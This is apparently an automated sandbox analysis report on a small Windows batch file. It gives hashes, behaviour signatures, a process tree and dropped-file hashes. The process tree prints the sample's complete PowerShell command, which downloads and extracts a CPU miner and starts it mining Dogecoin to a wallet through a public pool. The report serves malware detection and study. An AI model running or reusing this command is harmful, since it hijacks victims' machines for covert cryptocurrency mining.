Analysis
-
max time kernel
1793s -
max time network
1806s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
04/02/2024, 17:29
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-ja
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 3996 powershell.exe 10 3996 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4332 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3996 powershell.exe 3996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3996 powershell.exe Token: SeManageVolumePrivilege 3800 svchost.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1808 wrote to memory of 3996 1808 cmd.exe 85 PID 1808 wrote to memory of 3996 1808 cmd.exe 85 PID 3996 wrote to memory of 2640 3996 powershell.exe 94 PID 3996 wrote to memory of 2640 3996 powershell.exe 94 PID 2640 wrote to memory of 4332 2640 cmd.exe 95 PID 2640 wrote to memory of 4332 2640 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4332
-
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:2444
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD57ffd48913865630103adde464fe68a5f
SHA117c35538502c0a7c793451791960b01208a44539
SHA2561958db08b270e0b615d93a4885eae329898373ce286c7065fc3c79282f6a325c
SHA51299abada1c4a9b43f6b5a63c19e069ba040b769b3e40ec3d2a5d8ca547b3957c828d9b9e6cf6ed6ec707c4f28d18f3e01a0b5433d35e7806632686208c78babf1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.7MB
MD54918f8aebed3965198ca7d39fe1d887a
SHA1e1405235c5a6b694c1e7c4b8b5533a67f655fc38
SHA2560809e88c6ff647f2862525ea38afc80de956062672fcb00524245331c300554f
SHA5123c7c2bd6f449b5184e7fa0fcd30f2d111107f7895f8b0cbecc43b3955d26d825dbddd52aafa88ae0769b33266b9b1c133fd6b6216738544b9cc6177e2b228377
-
Filesize
1.7MB
MD53745839c5728d2ab5a4ca7c268dafc40
SHA15d0a27472a71bc35664f1654f4bdcfab6d5e67ff
SHA2566ab15307177e72c33bf76657de5b3baf918d676f07370cd65da0017641aa38f7
SHA5120fcdef2dee0e988dd3055beb97af4de613e75856fa8d2c24d0de56bb8d0b1cd769ca65c755c0534aec7080b9bdffb57f1a65495278e81358550f28c71bda81a5
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
940KB
MD5533d539278461992e236386e6f463271
SHA100f43b8555b4c2c78650d6c1fc55826ae69b87d1
SHA256b3d147ec865514bd159406240c549e4983c36f4fffc15437fc47c05becc7c0f9
SHA512b11830edc59c49f22fff85fb91b2ec3664e91ab9959305bcfc3009f561b7c6025adb706ff911db59a5e01ce9071ba21a07441cf9c4d19ddee583a28e233a1383
-
Filesize
921KB
MD5a43e8d93b6b05abff0a7e27c119f30ea
SHA1c347af2d2b7854d81cac3345bde615137f8cda4b
SHA25614ac6c9439d99b11e9fa107b2077ef5ac1f33fc3f4a328fadba6a58ee4729668
SHA512c436f9fcc869508cde597c3859ab04974150e720797b5bcf893ad4edf0b009e919a3fa92a178c6e821e673db6b80e81789313f42868ad7fbea8c67811f90db5e
-
Filesize
1.0MB
MD579f516211d407a8ec27afa1974f8d546
SHA14c77d31c11b460393121d990273643cfa8649fa5
SHA2568f9876bca235d0ac79883dea1a20d197aaf8a926af5df5066620d14bbe54c7bc
SHA5121830b666a21683a745ab3b6d4185c985f6c30aea68c5dbe251caf9459a6754695d1987b3c22cefd12088cd895341c495087bdc5586d3b9c9493a6d164e4c4a3c
-
Filesize
1.7MB
MD5dd1526e4a5f3f2dd2d73cc0d27909ebe
SHA1d21c9a131ea202ddac350773a74d9a75d2b01bf7
SHA2562c5da9e4e3ae74e93ce86beac253a93b0ebc2180f72773a2088782abc09b7bbe
SHA512482b246d88bcd18f007dfd67898a892abfd73561cf6b414ccf475cd8ee6f292fea3594b3a92874328d45ba19541e6fceaf02d7940dcc5228704426076b102676
-
Filesize
1.4MB
MD5110299fddba773669511f8cbe75dd510
SHA15c088847bcf82ae0474cdc968ab6e95c79f09a4d
SHA256eefec2b8e4fd8215a5f7e06664c000532eb25f071e0d769aa65f90bdd12993c7
SHA5123193d3dc0f0380d55406a8c9bc3ae082bfc598fb4c9b63fd44d16394a9a4f7845427dc9bd0041ab6df19eb851234d4b581fe12b72c04b9de9f720fd169c51244
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770